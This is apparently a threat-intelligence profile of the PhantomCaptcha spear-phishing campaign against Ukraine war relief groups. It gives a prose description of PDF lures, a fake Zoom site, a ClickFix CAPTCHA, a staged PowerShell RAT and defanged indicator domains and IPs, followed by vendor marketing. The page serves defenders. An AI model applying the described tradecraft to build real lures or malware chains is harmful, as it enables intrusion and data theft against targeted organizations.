PhantomCaptcha
PhantomCaptcha is the name given by SentinelOne to a coordinated spear-phishing campaign active on October 8, 2025, targeting organizations involved in Ukraine war relief efforts, including the Red Cross, UNICEF, NRC, and local administrations. The attackers impersonated the Ukrainian President’s Office and used weaponized PDF lures that redirected victims to a fake Zoom site, zoomconference[.]app, followed by a ClickFix-style fake Cloudflare CAPTCHA designed to trick users into executing a malicious PowerShell command. The intrusion chain used a three-stage PowerShell payload. Stage 1 was an obfuscated downloader script named cptch. Stage 2 fingerprinted the host by collecting the host name, domain, user, UUID, and PID, sent XOR-encrypted data to command-and-control infrastructure, disabled PowerShell history, and retrieved an encrypted third stage. Stage 3 executed an in-memory WebSocket-based RAT that accepted Base64/JSON commands, including synchronous cmd and asynchronous psh execution, returned command output and system identifiers, and maintained persistent reconnect logic. SentinelOne assessed the final payload enabled arbitrary remote command execution, data exfiltration, and potential deployment of additional malware. The campaign demonstrated moderate OPSEC and was active for approximately 24 hours, with user-facing lure infrastructure taken down quickly while backend C2 remained active, suggesting compartmentalization. Infrastructure associated with the operation included zoomconference[.]app on 193.233.23[.]81, described as hosted on a Russian KVMKA VPS, as well as linked infrastructure including goodhillsenterprise[.]com on 45.15.156[.]24 and bsnowcommunications[.]com on 185.142.33[.]131. Attackers registered zoomconference[.]click the day after the operation. SentinelOne also linked fake Android apps hosted on princess-mens[.]click that were designed to steal contacts, media, and location data. Campaign setup was traced back to March 27, 2025, when goodhillsenterprise[.]com was registered to host obfuscated PowerShell malware. Attribution was not confirmed. SentinelOne noted that the use of ClickFix could suggest a possible link to the Russian APT group COLDRIVER, but no definitive attribution was established. No additional aliases or sub-groups were directly identified in the provided content.
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- humanitarian
- government
Recent activity
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A spearphishing campaign targeting Ukrainian war relief organizations, using weaponized PDFs and fake CAPTCHA pages to deliver a multi-stage WebSocket RAT.
Coordinated spear-phishing activity targeting Ukraine war relief organizations using weaponized PDFs that lead to a fake Zoom site and a ‘ClickFix’-style fake Cloudflare CAPTCHA to trick victims into running a malicious multi-stage PowerShell chain that culminates in an in-memory WebSocket-based RAT for remote command execution and potential data exfiltration.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.